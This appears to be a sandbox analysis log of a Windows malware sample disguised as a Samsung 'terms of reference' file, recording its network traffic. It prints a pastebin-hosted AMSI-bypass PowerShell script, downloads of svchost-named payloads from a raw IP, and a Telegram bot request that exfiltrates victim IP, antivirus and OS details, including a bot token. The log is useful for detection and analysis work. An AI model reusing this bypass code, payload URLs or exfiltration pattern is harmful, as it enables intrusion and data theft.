                                                                                                                                                                                      Feb 17, 2025 18:58:28.620762110 CET4972080192.168.2.5208.95.112.1
                                                                                                                                                                                      Feb 17, 2025 18:58:28.625540972 CET8049720208.95.112.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606136084 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606293917 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.606606007 CET5978780192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.607273102 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.609744072 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.609818935 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.610049963 CET5978680192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.610476971 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.611358881 CET805978789.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612328053 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612426996 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612598896 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.614814043 CET805978689.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615331888 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615536928 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615700960 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:37.617357969 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:37.620515108 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:42.948951960 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:58:42.953900099 CET8049714172.67.74.152192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:42.953980923 CET4971480192.168.2.5172.67.74.152
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015064001 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015165091 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.015374899 CET5978880192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.020131111 CET805978889.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.025996923 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.026113033 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.026199102 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.028078079 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.028115034 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030762911 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030826092 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.030932903 CET5978980192.168.2.589.23.97.214
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032056093 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032087088 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032145977 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032332897 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.032346964 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.035706043 CET805978989.23.97.214192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.642360926 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.648015976 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.648032904 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.653871059 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.697560072 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.697575092 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.698028088 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.698123932 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.702140093 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.702157974 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981281996 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981362104 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981417894 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981822968 CET59791443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:58:59.981841087 CET44359791149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031507969 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031589985 CET44359790149.154.167.220192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031713963 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031963110 CET59790443192.168.2.5149.154.167.220
                                                                                                                                                                                      Feb 17, 2025 18:59:00.031984091 CET44359790149.154.167.220192.168.2.5

                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Feb 17, 2025 18:57:13.055994034 CET6414453192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:13.062864065 CET53641441.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:27.955296040 CET5115453192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:28.085192919 CET53511541.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:28.615974903 CET6351853192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:28.622988939 CET53635181.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:29.327328920 CET5608953192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:57:30.317960024 CET53560891.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:32.158023119 CET53575901.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:57:33.767694950 CET53631001.1.1.1192.168.2.5
                                                                                                                                                                                      Feb 17, 2025 18:58:59.018532991 CET5181053192.168.2.51.1.1.1
                                                                                                                                                                                      Feb 17, 2025 18:58:59.025162935 CET53518101.1.1.1192.168.2.5

                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                      Feb 17, 2025 18:57:13.055994034 CET192.168.2.51.1.1.10xc29bStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:27.955296040 CET192.168.2.51.1.1.10x909cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:28.615974903 CET192.168.2.51.1.1.10xd378Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:29.327328920 CET192.168.2.51.1.1.10x14c8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:58:59.018532991 CET192.168.2.51.1.1.10xa65Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                      Feb 17, 2025 18:57:13.062864065 CET1.1.1.1192.168.2.50xc29bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:13.062864065 CET1.1.1.1192.168.2.50xc29bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:13.062864065 CET1.1.1.1192.168.2.50xc29bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:28.085192919 CET1.1.1.1192.168.2.50x909cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:28.085192919 CET1.1.1.1192.168.2.50x909cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:28.085192919 CET1.1.1.1192.168.2.50x909cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:28.622988939 CET1.1.1.1192.168.2.50xd378No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:57:30.317960024 CET1.1.1.1192.168.2.50x14c8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                      Feb 17, 2025 18:58:59.025162935 CET1.1.1.1192.168.2.50xa65No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                      • pastebin.com
                                                                                                                                                                                      • api.telegram.org
                                                                                                                                                                                      • api.ipify.org
                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                      • 89.23.97.214

                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      0192.168.2.549714172.67.74.152801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:28.128469944 CET39OUTGET / HTTP/1.1
                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                      Feb 17, 2025 18:57:28.598639965 CET429INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:57:28 GMT
                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 9137a8f54c864251-EWR
                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1531&rtt_var=765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=39&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      1192.168.2.549720208.95.112.1801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:28.628977060 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                      Feb 17, 2025 18:57:29.109947920 CET482INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:57:28 GMT
                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                      Content-Length: 305
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/Chicago","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      2192.168.2.56079189.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:33.335258961 CET65OUTGET /TeamBuild/win64_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      3192.168.2.56079289.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:33.336797953 CET65OUTGET /TeamBuild/win32_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      4192.168.2.55967289.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810682058 CET65OUTGET /TeamBuild/win32_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      5192.168.2.55967189.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:57:54.810683012 CET65OUTGET /TeamBuild/win64_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      6192.168.2.55978689.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:58:16.193226099 CET65OUTGET /TeamBuild/win32_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      7192.168.2.55978789.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:58:16.197654009 CET65OUTGET /TeamBuild/win64_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      8192.168.2.55978889.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:58:37.612598896 CET65OUTGET /TeamBuild/win64_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      9192.168.2.55978989.23.97.214801988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Feb 17, 2025 18:58:37.615700960 CET65OUTGET /TeamBuild/win32_svchost.exe HTTP/1.1
                                                                                                                                                                                      Host: 89.23.97.214


                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      0192.168.2.549704172.67.19.244433276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2025-02-17 17:57:13 UTC169OUTGET /raw/WHKzW2nr HTTP/1.1
                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                      Host: pastebin.com
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2025-02-17 17:57:13 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:57:13 GMT
                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                      x-xss-protection: 1;mode=block
                                                                                                                                                                                      cache-control: public, max-age=1801
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Age: 1625
                                                                                                                                                                                      Last-Modified: Mon, 17 Feb 2025 17:30:08 GMT
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 9137a898aeee19bb-EWR
                                                                                                                                                                                      2025-02-17 17:57:13 UTC971INData Raw: 31 37 33 37 0d 0a 0d 0a 0d 0a 41 64 64 2d 54 79 70 65 20 2d 54 79 70 65 44 65 66 69 6e 69 74 69 6f 6e 20 40 22 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0d 0a 0d 0a 70 75 62 6c 69 63 20 63 6c 61 73 73 20 4e 75 6b 65 41 4d 53 49 0d 0a 7b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 4f 50 45 52 41 54 49 4f 4e 20 3d 20 30 78 30 30 30 38 3b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 52 45 41 44 20 3d 20 30 78 30 30 31 30 3b 0d 0a 20 20 20 20 70 75
                                                                                                                                                                                      Data Ascii: 1737Add-Type -TypeDefinition @"using System;using System.Diagnostics;using System.Runtime.InteropServices;public class NukeAMSI{ public const int PROCESS_VM_OPERATION = 0x0008; public const int PROCESS_VM_READ = 0x0010; pu
                                                                                                                                                                                      2025-02-17 17:57:13 UTC1369INData Raw: 73 65 28 49 6e 74 50 74 72 20 48 61 6e 64 6c 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 4c 6f 61 64 4c 69 62 72 61 72 79 3a 20 4c 6f 61 64 73 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 6d 6f 64 75 6c 65 20 69 6e 74 6f 20 74 68 65 20 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 66 20 74 68 65 20 63 61 6c 6c 69 6e 67 20 70 72 6f 63 65 73 73 2e 0d 0a 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 29 5d 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 4c 6f 61 64 4c 69 62 72 61 72 79 28 73 74 72 69 6e 67 20 6c 70 46 69 6c 65 4e 61 6d 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 47 65 74 50 72 6f 63 41 64 64
                                                                                                                                                                                      Data Ascii: se(IntPtr Handle); // LoadLibrary: Loads the specified module into the address space of the calling process. [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr LoadLibrary(string lpFileName); // GetProcAdd
                                                                                                                                                                                      2025-02-17 17:57:13 UTC1369INData Raw: 5d 24 70 72 6f 63 65 73 73 49 64 0d 0a 20 20 20 20 29 0d 0a 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 4d 6f 64 69 66 79 69 6e 67 20 41 4d 53 49 20 66 6f 72 20 70 72 6f 63 65 73 73 20 49 44 3a 20 24 70 72 6f 63 65 73 73 49 64 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 0d 0a 20 20 20 20 24 70 61 74 63 68 20 3d 20 5b 62 79 74 65 5d 30 78 45 42 20 20 23 20 54 68 65 20 70 61 74 63 68 20 62 79 74 65 20 74 6f 20 6d 6f 64 69 66 79 20 41 4d 53 49 20 62 65 68 61 76 69 6f 72 0d 0a 0d 0a 20 20 20 20 24 6f 62 6a 65 63 74 41 74 74 72 69 62 75 74 65 73 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 75 6b 65 41 4d 53 49 2b 4f 42 4a 45 43 54 5f 41 54 54 52 49 42 55 54 45 53 0d 0a 20 20 20 20 24 63 6c 69 65 6e 74 49 64 20 3d 20 4e
                                                                                                                                                                                      Data Ascii: ]$processId ) Write-Host "Modifying AMSI for process ID: $processId" -ForegroundColor Cyan $patch = [byte]0xEB # The patch byte to modify AMSI behavior $objectAttributes = New-Object NukeAMSI+OBJECT_ATTRIBUTES $clientId = N
                                                                                                                                                                                      2025-02-17 17:57:13 UTC1369INData Raw: 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 66 69 6e 64 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 61 6d 73 69 2e 64 6c 6c 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a 20 20 20 20 20 20 20 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 4e 74 43 6c 6f 73 65 28 24 68 48 61 6e 64 6c 65 29 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 23 20 43 61 6c 63 75 6c 61 74 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 70 61 74 63 68 20 61 64 64 72 65 73 73 20 62 79 20 6f 66 66 73 65 74 74 69 6e 67 20 66 72 6f 6d 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 0d 0a 20 20 20 20 24 70 61 74 63
                                                                                                                                                                                      Data Ascii: Write-Host "Failed to find AmsiOpenSession function in amsi.dll." -ForegroundColor Red [NukeAMSI]::NtClose($hHandle) return } # Calculate the correct patch address by offsetting from AmsiOpenSession function $patc
                                                                                                                                                                                      2025-02-17 17:57:13 UTC873INData Raw: 72 6f 74 65 63 74 69 6f 6e 2e 2e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 20 20 20 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 20 3d 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 28 24 68 48 61 6e 64 6c 65 2c 20 24 70 61 74 63 68 41 64 64 72 2c 20 24 73 69 7a 65 2c 20 24 6f 6c 64 50 72 6f 74 65 63 74 2c 20 5b 72 65 66 5d 24 6f 6c 64 50 72 6f 74 65 63 74 29 0d 0a 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 72 65 73 74 6f 72 65 20 6d 65 6d 6f 72 79 20 70 72 6f 74 65 63 74 69 6f 6e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f
                                                                                                                                                                                      Data Ascii: rotection..." -ForegroundColor Cyan $restoreStatus = [NukeAMSI]::VirtualProtectEx($hHandle, $patchAddr, $size, $oldProtect, [ref]$oldProtect) if (-not $restoreStatus) { Write-Host "Failed to restore memory protection." -ForegroundColo
                                                                                                                                                                                      2025-02-17 17:57:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      1192.168.2.549726149.154.167.2204431988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2025-02-17 17:57:31 UTC409OUTGET /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002264615855&text=%F0%9F%8F%B4%20%20Country%3A%20United%20States%0A%E2%9C%96%EF%B8%8F%20IP%3A%208.46.123.189%0A%E2%9C%96%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%E2%9C%96%EF%B8%8F%20OS%3A%20Microsoft%20Windows%2010%20Pro%0A%E2%9C%96%EF%B8%8F%20Language%3A%20English%20%28Switzerland%29%0A HTTP/1.1
                                                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                                                      2025-02-17 17:57:32 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:57:32 GMT
                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                      Content-Length: 597
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                      2025-02-17 17:57:32 UTC597INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 31 34 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
